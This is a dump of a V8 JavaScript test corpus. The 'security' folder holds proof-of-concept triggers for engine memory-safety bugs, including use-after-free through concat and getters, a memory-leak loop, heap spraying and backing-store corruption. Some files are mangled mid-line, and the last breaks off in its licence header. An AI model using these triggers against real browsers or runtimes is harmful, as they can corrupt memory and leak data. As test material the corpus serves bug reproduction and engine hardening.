| var y = 2; 19 | return (1 & z) | y++; 20 | } 21 | 22 | //assertEquals(3, g()); 23 | //assertEquals(3, g()); 24 | g(); 25 | g(); 26 | %OptimizeFunctionOnNextCall(g); 27 | //assertEquals(3, g()); 28 | g(); 29 | 30 | function h() { 31 | var y = 3; 32 | return (3 & z) & y++; 33 | } 34 | 35 | //assertEquals(3, h()); 36 | //assertEquals(3, h()); 37 | h(); 38 | h(); 39 | %OptimizeFunctionOnNextCall(h); 40 | //assertEquals(3, h()); 41 | h(); 42 | 43 | function i() { 44 | var y = 2; 45 | return (1 & z) ^ y++; 46 | } 47 | 48 | //assertEquals(3, i()); 49 | //assertEquals(3, i()); 50 | i(); 51 | i(); 52 | %OptimizeFunctionOnNextCall(i); 53 | //assertEquals(3, i()); 54 | i(); 55 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/be50310cae90a2e6a096c92c12b4e27e.js: -------------------------------------------------------------------------------- 1 | function g() { 2 | for (var x in [0]) { 3 | try { 4 | while (true); 5 | } catch(e) { 6 | continue; 7 | } 8 | } 9 | } 10 | g(); 11 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/c08a6606a0401615a9f6c054a517dafa.js: -------------------------------------------------------------------------------- 1 | function myOtherModNeg2ToThe31(b) { 2 | return -2147483648 % b; 3 | } 4 | 5 | for (var i = 0; i < 200; ++i) { 6 | myOtherModNeg2ToThe31(-1); 7 | } 8 | 9 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/c0b1729c6e3d03688066fb6fd82d301e.js: -------------------------------------------------------------------------------- 1 | var count = 0; 2 | function f() { 3 | try { 4 | f(); 5 | } catch(e) { 6 | if (count < 100) { 7 | count++; 8 | %GetDebugContext(); 9 | } 10 | } 11 | } 12 | f(); 13 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/c390ab15b6f2424d9e27a6d6f8e65f6f.js: -------------------------------------------------------------------------------- 1 | var a = [function() {}, function() {}]; 2 | for (;;) { a = a.concat(a); } 3 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/cf4784fbf5952207fe4add954c7cf7cc.js: -------------------------------------------------------------------------------- 1 | // Copyright 2011 the V8 project authors. All rights reserved. 2 | // Redistribution and use in source and binary forms, with or without 3 | // modification, are permitted provided that the following conditions are 4 | // met: 5 | // 6 | // * Redistributions of source code must retain the above copyright 7 | // notice, this list of conditions and the following disclaimer. 8 | // * Redistributions in binary form must reproduce the above 9 | // copyright notice, this list of conditions and the following 10 | // disclaimer in the documentation and/or other materials provided 11 | // with the distribution. 12 | // * Neither the name of Google Inc. nor the names of its 13 | // contributors may be used to endorse or promote products derived 14 | // from this software without specific prior written permission. 15 | // 16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 18 | // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 19 | // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 20 | // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 21 | // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 22 | // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 23 | // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 25 | // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 26 | // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | 28 | // Flags: --allow-natives-syntax 29 | 30 | // Test that the Lithium environment iterator does stop iteration early. 31 | "use strict"; 32 | 33 | function f0() { 34 | return f1('literal', true); 35 | } 36 | 37 | function f1(x, y) { 38 | return f2(x, y); 39 | } 40 | 41 | // Because it's strict, f2 has an environment containing only the constants 42 | // undefined, 'literal', and false. Bug 1423 would cause environment 43 | // iteration to stop early. 44 | // 45 | // Bug manifests as UNREACHABLE code (due to an unallocated register) in 46 | // debug builds. 47 | function f2(x, y) { 48 | if (y) { 49 | if (f3(x, 'other-literal')) { 50 | return 0; 51 | } else { 52 | return 1; 53 | } 54 | } else { 55 | return 2; 56 | } 57 | } 58 | 59 | function f3(x, y) { 60 | return x === y; 61 | } 62 | 63 | for (var i = 0; i < 5; ++i) f0(); 64 | %OptimizeFunctionOnNextCall(f0); 65 | //assertEquals(1, f0()); 66 | f0(); 67 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/d168a1e007a7088781edf09fa13064c3.js: -------------------------------------------------------------------------------- 1 | Object.defineProperty({},"foo",{set:function(){},configurable:false}); 2 | Object.defineProperty({},"foo",{get:function(){},configurable:false}); 3 | Object.defineProperty({},"foo",{}); 4 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/e2fdedf89261d27bff0f7731ef14effc.js: -------------------------------------------------------------------------------- 1 | m=function(x){n(x,x>>0)}; 2 | n=function(x,y){((Math.fround(x)>>0)/(y-(0x80000000|0)|0))|m}; 3 | a=[,,,,,,-0x80000001,,0]; 4 | for(j=0;j true); 2 | "a".match(); 3 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/ec65741fafce1061aeec78faa654a279.js: -------------------------------------------------------------------------------- 1 | Array.prototype.__proto__ = null; 2 | var __v_14 = Array.prototype.push; 3 | var __v_16 = Array.prototype; 4 | function __f_16(a) { 5 | __v_14.call(a); 6 | } 7 | function __f_15() { 8 | __f_16(__v_16); 9 | } 10 | __f_16([]); 11 | __f_16([]); 12 | %OptimizeFunctionOnNextCall(__f_15); 13 | __f_15(); 14 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/ee62aff7f0bab8b73c8e0328715ac650.js: -------------------------------------------------------------------------------- 1 | Error.prepareStackTrace = function(e, frames) { return frames; } 2 | //assertThrows(function() { new Error().stack[0].getMethodName.call({}); }); 3 | try { 4 | throw new Error(); 5 | } catch (e) { 6 | new e.stack[0].getMethodName(); 7 | } 8 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/f295639a4f672a0cb731342b8df7489a.js: -------------------------------------------------------------------------------- 1 | (function(){function s(n){n[0]}for(let y of[...[],,]){try{s(y)}catch(e){}}})() 2 | 3 | -------------------------------------------------------------------------------- /js_tests/V8/non-security/f3ee1fc87ff3bf21a40def6745f58456.js: -------------------------------------------------------------------------------- 1 | function h(a,b){ 2 | for(var i=0; i {}, 39 | a1 = (function() { 40 | let arr = []; 41 | for(var i = 0; i < 23; i++) { 42 | arr.push(0x20202020); // spray memory to 0x20202020 << 1 == 0x40404040 43 | } 44 | })() 45 | ); 46 | x; 47 | 48 | -------------------------------------------------------------------------------- /js_tests/V8/security/21d60617d98913e374f3558e9d406869.js: -------------------------------------------------------------------------------- 1 | async function* asyncGenerator() { 2 | } 3 | 4 | let gen = asyncGenerator(); 5 | gen.return({ 6 | get then() { 7 | delete this.then; 8 | 9 | gen.next(); 10 | } 11 | }); 12 | -------------------------------------------------------------------------------- /js_tests/V8/security/2395eade5efe87e1f11785282f84a355.js: -------------------------------------------------------------------------------- 1 | function KeyedStoreIC(a) { a[0] = Math.E; } 2 | 3 | // literal with a fast double elements backing store 4 | var literal = [1.2]; 5 | 6 | // specialize the IC for fast double elements 7 | KeyedStoreIC(literal); 8 | KeyedStoreIC(literal); 9 | 10 | // truncate js array to 0 elements: 11 | // backing store will be replaces with empty fixed array 12 | literal.length = 0; 13 | 14 | // ArrayPush built-in will replace empty fixed array backing 15 | // store with 19 elements fixed array backing store. 16 | // Leading to a mismatch between the map and the backing store. 17 | // Debug mode will crash here in set_elements accessor. 18 | literal.push(Math.E, Math.E); 19 | 20 | // Corrupt the backing store! 21 | KeyedStoreIC(literal); 22 | 23 | // Release mode will crash here when trying to visit parts of E as pointers. 24 | gc(); 25 | -------------------------------------------------------------------------------- /js_tests/V8/security/23efb40dcf732313d800016b2829d262.js: -------------------------------------------------------------------------------- 1 | var p = new Proxy([], {}); 2 | var b_dp = Object.prototype.defineProperty; 3 | 4 | class MyArray extends Array { 5 | static get [Symbol.species]() { 6 | return function() { return p; } 7 | }; // custom constructor which returns a proxy object 8 | } 9 | 10 | var w = new MyArray(100); 11 | w[1] = 0.1; 12 | w[2] = 0.1; 13 | 14 | function gc() { 15 | for (var i = 0; i < 0x100000; ++i) { 16 | var a = new String(); 17 | } 18 | } 19 | 20 | function evil_callback() { 21 | w.length = 1; // shorten the array so the backstore pointer is relocated 22 | gc(); // force gc to move the array's elements backstore 23 | return b_dp; 24 | } 25 | 26 | Object.prototype.__defineGetter__("defineProperty", evil_callback); 27 | 28 | var c = Array.prototype.concat.call(w); 29 | 30 | for (var i = 0; i < 20; i++) { // however many values you want to leak 31 | console.log(c[i]); 32 | } 33 | -------------------------------------------------------------------------------- /js_tests/V8/security/277a11e956ef6e311937bb160453ba8f.js: -------------------------------------------------------------------------------- 1 | function gc() 2 | { 3 | for(var i=0;i<((1024 * 1024)/0x10);i++) 4 | { 5 | var a= new String(); 6 | } 7 | } 8 | 9 | array = new Array(10) 10 | array[0] = 1.1 11 | array[2] = 2.1 12 | array[3] = 3.1 13 | 14 | var proto = {}; 15 | array.__proto__ = proto; 16 | 17 | Object.defineProperty( 18 | proto, 1, { 19 | get() { 20 | array.length = 1; 21 | gc(); 22 | return "value from proto"; 23 | }, 24 | set(new_value) { } 25 | }); 26 | 27 | Array.prototype.concat.call(array); 28 | -------------------------------------------------------------------------------- /js_tests/V8/security/2b5602c8168df9651bcd0c4f10aef68b.js: -------------------------------------------------------------------------------- 1 | var number = 5.0260805378947765e+223; 2 | var nf = new Intl.NumberFormat('bs-u-nu-bzcu-cab-cabs-avnlubs-avnihu-zcu-cab-cbs-avnllubs-avnihq-zcu-cab-cbs-ubs-avnihu-cabs-flus-xxd-vnluy'); 3 | var f = nf.format(number); 4 | -------------------------------------------------------------------------------- /js_tests/V8/security/3e5bdc6fe48a04f7e2a2e8101245a1f5.js: -------------------------------------------------------------------------------- 1 | var o0 = []; 2 | var o1 = []; 3 | var cnt = 0; 4 | o1.__defineGetter__(0, function() { 5 | if (cnt++ > 2) return; 6 | o0.shift(); 7 | gc(); 8 | o0.push(0); 9 | o0.concat(o1); 10 | }); 11 | o1[0]; 12 | -------------------------------------------------------------------------------- /js_tests/V8/security/412812e4deeeb6b473a64d50655ec6c3.js: -------------------------------------------------------------------------------- 1 | try { 2 | function make_watcher(name) { 3 | return 4 | } 5 | var o, p; 6 | function f(flag) { 7 | if (flag) { 8 | o = arguments; 9 | } else { 10 | p = arguments; 11 | o.watch(0, (arguments-1901)('o')); 12 | p.watch(0, make_watcher('p')); 13 | p.unwatch(0); 14 | o.unwatch(0); 15 | p[0] = 4; 16 | assertEq(flag, 4); 17 | } 18 | } 19 | f(true); 20 | f(false); 21 | reportCompare(true, true); 22 | } catch(exc1) { } 23 | 24 | try { 25 | function __noSuchMethod__( ) { 26 | if (anonymous == "1") 27 | return NaN; 28 | return __construct__; 29 | } 30 | f.p = function() {}; 31 | Object.freeze(p); 32 | new new freeze().p; 33 | reportCompare(0, 0, "ok"); 34 | } catch(exc2) {} 35 | 36 | function gc() { 37 | var x = "foo"; 38 | var y = 10; 39 | while (y > 0) { 40 | x = x + x; 41 | } 42 | delete x; 43 | } 44 | gc(); 45 | -------------------------------------------------------------------------------- /js_tests/V8/security/4959f5a9d9c93a0726a01455642808a6.js: -------------------------------------------------------------------------------- 1 | function KeyedStoreIC(a) { a[(1)] = Math.E; } 2 | var literal = [1.2]; 3 | literal.length = 0; 4 | literal.push('0' && 0 ); 5 | KeyedStoreIC(literal); 6 | gc(); 7 | 8 | -------------------------------------------------------------------------------- /js_tests/V8/security/4d895e00a3333cc5b64f294ea7e28d6e.js: -------------------------------------------------------------------------------- 1 | //var _size = 4271300; 2 | //var data = new Uint8Array(_size); 3 | 4 | //function out_fun() { 5 | // 'use asm'; 6 | // function in_func() { 7 | // } 8 | // return in_func; 9 | //} 10 | 11 | //data.sort(out_fun); 12 | function asm() { 13 | 'use asm'; 14 | function f() {} 15 | return f; 16 | } 17 | for (var i = 0; i < 50000; ++i) { 18 | asm(); 19 | } 20 | -------------------------------------------------------------------------------- /js_tests/V8/security/529a774f4310f0b70b39326ca6aee51e.js: -------------------------------------------------------------------------------- 1 | var b2 = new Uint8Array( 171); 2 | b2[0] = 0x0; 3 | b2[1] = 0x61; 4 | b2[2] = 0x73; 5 | b2[3] = 0x6d; 6 | b2[4] = 0x1; 7 | b2[5] = 0x0; 8 | b2[6] = 0x0; 9 | b2[7] = 0x0; 10 | b2[8] = 0x1; 11 | b2[9] = 0xe; 12 | b2[10] = 0x3; 13 | b2[11] = 0x60; 14 | b2[12] = 0x1; 15 | b2[13] = 0x7f; 16 | b2[14] = 0x0; 17 | b2[15] = 0x60; 18 | b2[16] = 0x0; 19 | b2[17] = 0x0; 20 | b2[18] = 0x60; 21 | b2[19] = 0x2; 22 | b2[20] = 0x7f; 23 | b2[21] = 0x7f; 24 | b2[22] = 0x1; 25 | b2[23] = 0x7f; 26 | b2[24] = 0x2; 27 | b2[25] = 0x23; 28 | b2[26] = 0x2; 29 | b2[27] = 0x2; 30 | b2[28] = 0x6a; 31 | b2[29] = 0x73; 32 | b2[30] = 0x3; 33 | b2[31] = 0x6d; 34 | b2[32] = 0x65; 35 | b2[33] = 0x6d; 36 | b2[34] = 0x2; 37 | b2[35] = 0x0; 38 | b2[36] = 0x1; 39 | b2[37] = 0x7; 40 | b2[38] = 0x69; 41 | b2[39] = 0x6d; 42 | b2[40] = 0x70; 43 | b2[41] = 0x6f; 44 | b2[42] = 0x72; 45 | b2[43] = 0x74; 46 | b2[44] = 0x73; 47 | b2[45] = 0xd; 48 | b2[46] = 0x69; 49 | b2[47] = 0x6d; 50 | b2[48] = 0x70; 51 | b2[49] = 0x6f; 52 | b2[50] = 0x72; 53 | b2[51] = 0x74; 54 | b2[52] = 0x65; 55 | b2[53] = 0x64; 56 | b2[54] = 0x5f; 57 | b2[55] = 0x66; 58 | b2[56] = 0x75; 59 | b2[57] = 0x6e; 60 | b2[58] = 0x63; 61 | b2[59] = 0x0; 62 | b2[60] = 0x0; 63 | b2[61] = 0x3; 64 | b2[62] = 0x3; 65 | b2[63] = 0x2; 66 | b2[64] = 0x1; 67 | b2[65] = 0x2; 68 | b2[66] = 0x7; 69 | b2[67] = 0x1e; 70 | b2[68] = 0x2; 71 | b2[69] = 0xd; 72 | b2[70] = 0x65; 73 | b2[71] = 0x78; 74 | b2[72] = 0x70; 75 | b2[73] = 0x6f; 76 | b2[74] = 0x72; 77 | b2[75] = 0x74; 78 | b2[76] = 0x65; 79 | b2[77] = 0x64; 80 | b2[78] = 0x5f; 81 | b2[79] = 0x66; 82 | b2[80] = 0x75; 83 | b2[81] = 0x6e; 84 | b2[82] = 0x63; 85 | b2[83] = 0x0; 86 | b2[84] = 0x1; 87 | b2[85] = 0xa; 88 | b2[86] = 0x61; 89 | b2[87] = 0x63; 90 | b2[88] = 0x63; 91 | b2[89] = 0x75; 92 | b2[90] = 0x6d; 93 | b2[91] = 0x75; 94 | b2[92] = 0x6c; 95 | b2[93] = 0x61; 96 | b2[94] = 0x74; 97 | b2[95] = 0x65; 98 | b2[96] = 0x0; 99 | b2[97] = 0x2; 100 | b2[98] = 0xa; 101 | b2[99] = 0x47; 102 | b2[100] = 0x2; 103 | b2[101] = 0x6; 104 | b2[102] = 0x0; 105 | b2[103] = 0x41; 106 | b2[104] = 0x2a; 107 | b2[105] = 0x10; 108 | b2[106] = 0x0; 109 | b2[107] = 0xb; 110 | b2[108] = 0x3e; 111 | b2[109] = 0x1; 112 | b2[110] = 0xff; 113 | b2[111] = 0xff; 114 | b2[112] = 0xff; 115 | b2[113] = 0xff; 116 | b2[114] = 0x0f; 117 | b2[115] = 0x7f; 118 | b2[116] = 0x20; 119 | b2[117] = 0x0; 120 | b2[118] = 0x20; 121 | b2[119] = 0x1; 122 | b2[120] = 0x41; 123 | b2[121] = 0x4; 124 | b2[122] = 0x6c; 125 | b2[123] = 0x6a; 126 | b2[124] = 0x21; 127 | b2[125] = 0x2; 128 | b2[126] = 0x2; 129 | b2[127] = 0x40; 130 | b2[128] = 0x3; 131 | b2[129] = 0x40; 132 | b2[130] = 0x20; 133 | b2[131] = 0x0; 134 | b2[132] = 0x20; 135 | b2[133] = 0x2; 136 | b2[134] = 0x46; 137 | b2[135] = 0xd; 138 | b2[136] = 0x1; 139 | b2[137] = 0x41; 140 | b2[138] = 0x2a; 141 | b2[139] = 0x10; 142 | b2[140] = 0x0; 143 | b2[141] = 0x20; 144 | b2[142] = 0x3; 145 | b2[143] = 0x41; 146 | b2[144] = 0xc4; 147 | b2[145] = 0x0; 148 | b2[146] = 0x20; 149 | b2[147] = 0x0; 150 | b2[148] = 0x36; 151 | b2[149] = 0x2; 152 | b2[150] = 0x0; 153 | b2[151] = 0x41; 154 | b2[152] = 0xc4; 155 | b2[153] = 0x0; 156 | b2[154] = 0x6a; 157 | b2[155] = 0x21; 158 | b2[156] = 0x3; 159 | b2[157] = 0x20; 160 | b2[158] = 0x0; 161 | b2[159] = 0x41; 162 | b2[160] = 0x4; 163 | b2[161] = 0x6a; 164 | b2[162] = 0x21; 165 | b2[163] = 0x0; 166 | b2[164] = 0xc; 167 | b2[165] = 0x0; 168 | b2[166] = 0xb; 169 | b2[167] = 0xb; 170 | b2[168] = 0x20; 171 | b2[169] = 0x3; 172 | b2[170] = 0xb; 173 | 174 | function f(){print("in f");} 175 | var memory = new WebAssembly.Memory({initial:1, maximum:1}); 176 | var mod = new WebAssembly.Module(b2); 177 | var i = new WebAssembly.Instance(mod, { imports : {imported_func : f}, js : {mem : memory}}); 178 | i.exports.accumulate.call(0, 5); 179 | 180 | -------------------------------------------------------------------------------- /js_tests/V8/security/569973c25a1e09d5e497efebfa2c60fa.js: -------------------------------------------------------------------------------- 1 | function foo(bar) { 2 | return arguments[bar]; 3 | } 4 | foo(0); // Handled in runtime. 5 | foo(-536870912); // Triggers bug. 6 | -------------------------------------------------------------------------------- /js_tests/V8/security/5a41732c2dc26305861bbcded53f456b.js: -------------------------------------------------------------------------------- 1 | function tt(){ 2 | var evil_o = {}; 3 | var reg = /abc/y; 4 | var num = {}; 5 | num.toString = function(){ 6 | change_to_dict(); 7 | return 0x0; 8 | } 9 | 10 | 11 | function change_to_dict(){ 12 | for(var i = 0;i < 0x100;i++){ 13 | reg["a"+i.toString(16)] = i; 14 | } 15 | } 16 | evil_o.toString = function(){ 17 | //change_to_dict(); 18 | reg.lastIndex = num; 19 | return "abc".repeat(0x1000); 20 | } 21 | 22 | String.prototype.replace.call(evil_o,reg,function(){}); 23 | } 24 | //alert(22); 25 | for(var i = 0;i < 0x1000;i++){ 26 | tt(); 27 | } 28 | 29 | //alert("1"); 30 | -------------------------------------------------------------------------------- /js_tests/V8/security/5af8cf9a35e1c8660f597d2705f1fb98.js: -------------------------------------------------------------------------------- 1 | // Copyright 2013 the V8 project authors. All rights reserved. 2 | // Redistribution and use in source and binary forms, with or without 3 | // modification, are permitted provided that the following conditions are 4 | // met: 5 | // 6 | // * Redistributions of source code must retain the above copyright 7 | // notice, this list of conditions and the following disclaimer. 8 | // * Redistributions in binary form must reproduce the above 9 | // copyright notice, this list of conditions and the following 10 | // disclaimer in the documentation and/or other materials provided 11 | // with the distribution. 12 | // * Neither the name of Google Inc. nor the names of its 13 | // contributors may be used to endorse or promote products derived 14 | // from this software without specific prior written permission. 15 | // 16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 18 | // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 19 | // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 20 | // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 21 | // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 22 | // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 23 | // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 25 | // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 26 | // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | 28 | var new_space_string = ""; 29 | for (var i = 0; i < 12800; ++i) { 30 | new_space_string += 31 | String.fromCharCode(Math.random() * 26 + (4294967295) | 0); 32 | } 33 | -------------------------------------------------------------------------------- /js_tests/V8/security/5f994376eaca6bb3aee94496bc7f3a27.js: -------------------------------------------------------------------------------- 1 | [0].every(function(){ Object.seal((new Int8Array(42))); }); 2 | 3 | -------------------------------------------------------------------------------- /js_tests/V8/security/68c51a20da2893d592c867ea7d96f835.js: -------------------------------------------------------------------------------- 1 | var gTestcases = new Array(); 2 | function TestCase(n, d, e, a) 3 | { 4 | gTestcases[gTc++] = this; 5 | for ( gTc=0; gTc < gTestcases.length; gTc++ ) { 6 | } 7 | } 8 | try { 9 | var SECTION = "15.5.4.11-6"; 10 | for ( var i = 0x0530; i <= 0x058F; i++ ) { 11 | new TestCase( SECTION, 12 | eval("var s = new String( String.fromCharCode(i) ); s.toLowerCase().charCodeAt(0)") ); 13 | } 14 | var gTc= 0; 15 | } catch(exc2) {} 16 | while(true) { 17 | function stopTest() 18 | { 19 | gc(); 20 | } 21 | test(); 22 | function test() { 23 | for ( 0; gTc < gTestcases.length; gTc++ ) { 24 | var MYOBJECT = new MyObject(); 25 | } 26 | stopTest(); 27 | } 28 | function MyObject( n ) { 29 | this.__proto__ = Number.prototype; 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /js_tests/V8/security/6fcd9b74a2f4f9c57664a959b219af73.js: -------------------------------------------------------------------------------- 1 | var t = 0; 2 | function burn() { 3 | i = [t, 1]; 4 | var M = [i[0], Math.cos(t) + i[7074959]]; 5 | t += .05; 6 | } 7 | for (var j = 0; j < 5; j++) { 8 | if (j == 2) %OptimizeFunctionOnNextCall(burn); 9 | burn(); 10 | } 11 | 12 | -------------------------------------------------------------------------------- /js_tests/V8/security/707798104262791113ec67d3ce412716.js: -------------------------------------------------------------------------------- 1 | // Copyright 2014 the V8 project authors. All rights reserved. 2 | // Redistribution and use in source and binary forms, with or without 3 | // modification, are permitted provided that the following conditions are 4 | // met: 5 | // 6 | // * Redistributions of source code must retain the above copyright 7 | // notice, this list of conditions and the following disclaimer. 8 | // * Redistributions in binary form must reproduce the above 9 | // copyright notice, this list of conditions and the following 10 | // disclaimer in the documentation and/or other materials provided 11 | // with the distribution. 12 | // * Neither the name of Google Inc. nor the names of its 13 | // contributors may be used to endorse or promote products derived 14 | // from this software without specific prior written permission. 15 | // 16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 18 | // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 19 | // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 20 | // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 21 | // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 22 | // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 23 | // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 25 | // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 26 | // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | 28 | // Flags: --allow-natives-syntax 29 | 30 | (function ArgumentsObjectWithOtherArgumentsInFrame() { 31 | function g() { 32 | return g.arguments; 33 | } 34 | 35 | function f(x) { 36 | g(); 37 | return arguments[0]; 38 | } 39 | f(); 40 | f(); 41 | %OptimizeFunctionOnNextCall(f); 42 | f(); 43 | })(); 44 | 45 | 46 | (function ArgumentsObjectWithOtherArgumentsDeopt() { 47 | function g(y) { 48 | y.o2 = 2; 49 | return g.arguments; 50 | } 51 | 52 | function f(x) { 53 | var o1 = { o2 : 1 }; 54 | var a = g(o1); 55 | o1.o2 = 3; 56 | return arguments[0] + a[0].o2; 57 | } 58 | f(0); 59 | f(0); 60 | %OptimizeFunctionOnNextCall(f); 61 | // assertEquals(3, f(0)); 62 | })(); 63 | -------------------------------------------------------------------------------- /js_tests/V8/security/73b99da7d97778c6f33164122eb8ce27.js: -------------------------------------------------------------------------------- 1 | function Test() { 2 | var left = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; 3 | var right = "YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY"; 4 | for (var i = 0; i < 100000; i++) { 5 | var cons = left + right; 6 | var substring = cons.substring(20, 80); 7 | try { 8 | with ({Test: 'inner' + i}) 9 | continue; 10 | } finally { } 11 | } 12 | } 13 | Test(); 14 | -------------------------------------------------------------------------------- /js_tests/V8/security/78e52b2219332d10bb59b13ed96d0435.js: -------------------------------------------------------------------------------- 1 | var a = []; 2 | a[1999] = 'e'; 3 | JSON.stringify(a.join(("\u0094" ))); 4 | -------------------------------------------------------------------------------- /js_tests/V8/security/7f57fecdab869371571069819f85ef95.js: -------------------------------------------------------------------------------- 1 | // Copyright 2014 the V8 project authors. All rights reserved. 2 | // Use of this source code is governed by a BSD-style license that can be 3 | // found in the LICENSE file. 4 | 5 | // Flags: --allow-natives-syntax --debug-code 6 | 7 | function f(a) { 8 | a[5000000] = 256; 9 | // assertEquals(256, a[5000000]); 10 | } 11 | 12 | var v1 = new Array(5000001); 13 | var v2 = new Array(10); 14 | f(v1); 15 | f(v2); 16 | f(v2); 17 | %OptimizeFunctionOnNextCall(f); 18 | f(v2); 19 | f(v1); 20 | -------------------------------------------------------------------------------- /js_tests/V8/security/8616cc6d366a11e2cef989fd98989f9c.js: -------------------------------------------------------------------------------- 1 | boom0 = (function(stdlib, foreign, heap){ 2 | "use asm"; 3 | var ff = Math.sign; 4 | var m32 = new stdlib.Int32Array(heap); 5 | function f(v) { 6 | m32[((1-ff(NaN) >>> 0) % 0xdc4e153) & v] = 0x12345678; 7 | } 8 | return f; 9 | })(this, {}, new ArrayBuffer(256)); 10 | %OptimizeFunctionOnNextCall(boom0); 11 | boom0(0xffffffff) 12 | -------------------------------------------------------------------------------- /js_tests/V8/security/8bc1faa8ef2df14c6ed20a0390912667.js: -------------------------------------------------------------------------------- 1 | let arr = []; 2 | arr[1000] = 0x1234; 3 | 4 | arr.__defineGetter__(256, function () { 5 | delete arr[256]; 6 | 7 | arr.unshift(1.1); 8 | arr.length = 0; 9 | }); 10 | 11 | Object.entries(arr).toString(); 12 | -------------------------------------------------------------------------------- /js_tests/V8/security/8d76376c6eda7e4b79b422956259a1de.js: -------------------------------------------------------------------------------- 1 | var data = new Uint8Array(0x100); 2 | for(i=0;i<0x100;i++)data[i]=0x41; 3 | f = new Function("\ 4 | vuln=(function(){\ 5 | \"use asm\";\ 6 | function f(i){\ 7 | for(i=0;i<0x10000;i++){\ 8 | var a= new Uint8Array(data); \ 9 | with(a[0]){};\ 10 | }\ 11 | }\ 12 | return f;})();\ 13 | ") 14 | f() 15 | vuln(); 16 | vuln(); 17 | -------------------------------------------------------------------------------- /js_tests/V8/security/8df92afc56bf07655198403ad5cc9025.js: -------------------------------------------------------------------------------- 1 | var a = [0,1,2,3]; 2 | a[2000000] = 2000000; 3 | a.length=2000; 4 | for (var i = 0; i <= 256; i++) { 5 | a[i] = new Object(); 6 | } 7 | -------------------------------------------------------------------------------- /js_tests/V8/security/8f19f80de422a34f72c284d9abd2a4bd.js: -------------------------------------------------------------------------------- 1 | // Copyright 2014 the V8 project authors. All rights reserved. 2 | // Redistribution and use in source and binary forms, with or without 3 | // modification, are permitted provided that the following conditions are 4 | // met: 5 | // 6 | // * Redistributions of source code must retain the above copyright 7 | // notice, this list of conditions and the following disclaimer. 8 | // * Redistributions in binary form must reproduce the above 9 | // copyright notice, this list of conditions and the following 10 | // disclaimer in the documentation and/or other materials provided 11 | // with the distribution. 12 | // * Neither the name of Google Inc. nor the names of its 13 | // contributors may be used to endorse or promote products derived 14 | // from this software without specific prior written permission. 15 | // 16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 18 | // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 19 | // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 20 | // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 21 | // SPECIAL, EXEMPLARY, OR 